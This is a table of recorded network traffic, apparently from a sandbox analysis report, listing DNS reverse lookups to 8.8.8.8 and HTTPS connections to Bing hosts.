| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |